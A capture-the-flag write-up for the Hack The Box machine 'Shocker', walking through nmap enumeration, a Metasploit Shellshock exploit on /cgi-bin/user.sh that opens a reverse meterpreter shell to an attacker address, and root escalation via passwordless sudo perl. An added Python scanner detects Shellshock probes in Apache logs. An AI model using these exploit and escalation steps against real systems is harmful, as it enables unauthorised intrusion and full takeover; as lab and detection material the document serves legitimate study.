Machine: https://app.hackthebox.com/machines/Shocker
On to the next machine! Being lazy, I tried port 80 before doing any scan:
So let’s bug him? We have the following software running on the server:
$ sudo nmap -sV -O shocker.htb
...
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
An old Apache means we should look for scripts in /cgi-bin, and maybe one of them can be exploited using Shellshock.
After much (dir)busting, I found this:
$ curl http://shocker.htb/cgi-bin/user.sh
Content-Type: text/plain
Just an uptime test script
08:49:56 up 1:21, 0 users, load average: 0.06, 0.06, 0.01
Then I used Metasploit with the following options (default values trimmed from the paste) and got an initial foothold as a user:
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS shocker.htb yes The target host(s)
RPORT 80 yes The target port (TCP)
TARGETURI /cgi-bin/user.sh yes Path to CGI script
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.4 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Linux x86_64
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > run
[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (1017704 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.56:40898) at 2023-01-09 08:58:46 -0500
meterpreter > getuid
Server username: shelly
And we have the user flag:
meterpreter > cat /home/shelly/user.txt
aada***********************************
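As an added example (not part of the write-up), here is a small Python scanner for the kind of request that popped user.sh: it parses Apache combined-format access log lines and flags any request whose User-Agent, Referer or request line carries the Shellshock function-definition prefix, noting whether the target sat under /cgi-bin/. The log lines and the probe strings are constructed, not taken from the machine.

```python
import re
from urllib.parse import unquote

# Signature of a Shellshock probe: a bash function definition ("() {") at the
# start of a header value, which a vulnerable bash parses when Apache exports
# that header as an environment variable for the CGI script.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" access log: host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def scan_combined_log(lines):
    """Return one dict per request whose headers or request line carry the
    Shellshock signature, noting whether it targeted a /cgi-bin/ path."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # skip lines that are not in combined format
        f = m.groupdict()
        parts = f["request"].split(" ")
        path = parts[1] if len(parts) >= 2 else f["request"]
        # Check each attacker-controlled field; the request line is also
        # checked URL-decoded, since Apache logs it as received on the wire.
        tainted = [name for name in ("agent", "referer", "request")
                   if SHELLSHOCK_RE.search(f[name]) or SHELLSHOCK_RE.search(unquote(f[name]))]
        if tainted:
            hits.append({"host": f["host"], "time": f["time"], "path": path,
                         "fields": tainted, "cgi_target": path.startswith("/cgi-bin/")})
    return hits

# Constructed sample lines: a plain curl of the script, a dirbusting miss,
# one probe in the User-Agent, and one URL-encoded probe in the request path.
SAMPLE_LOG = [
    '10.10.14.4 - - [09/Jan/2023:08:49:56 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 97 "-" "curl/7.86.0"',
    '10.10.14.4 - - [09/Jan/2023:08:50:02 -0500] "GET /cgi-bin/admin.cgi HTTP/1.1" 404 275 "-" "gobuster/3.1"',
    '10.10.14.4 - - [09/Jan/2023:08:58:46 -0500] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :;}; /bin/echo probe"',
    '10.10.14.4 - - [09/Jan/2023:08:59:10 -0500] "GET /index.html?%28%29%20%7B%20:;%7D; HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for h in scan_combined_log(SAMPLE_LOG):
        kind = "CGI" if h["cgi_target"] else "non-CGI"
        print(f'{h["time"]} {h["host"]} {h["path"]} via {",".join(h["fields"])} [{kind}]')
```

A hit on a /cgi-bin/ path deserves a look at the server's error log and process tree around that timestamp; a hit on a non-CGI path is usually scanner noise, since the script handler never exported the header.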
Getting root doesn’t seem to be much more complicated. We can run sudo perl as root without any password:
meterpreter > shell
Process 3852 created.
Channel 4 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
shelly@Shocker:~$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
So we g3t r00t and find the flag:
$ echo "system('whoami');" | sudo /usr/bin/perl
root
$ echo "system('cat /root/root.txt');" | sudo /usr/bin/perl
ff97****************************
What did we learn from this machine?
If the server looks empty, keep enumerating the URL. Go for the specific file types one would expect to find in directories like cgi-bin. E.g. don’t look for .php files in cgi-bin, but rather for .cgi or .sh.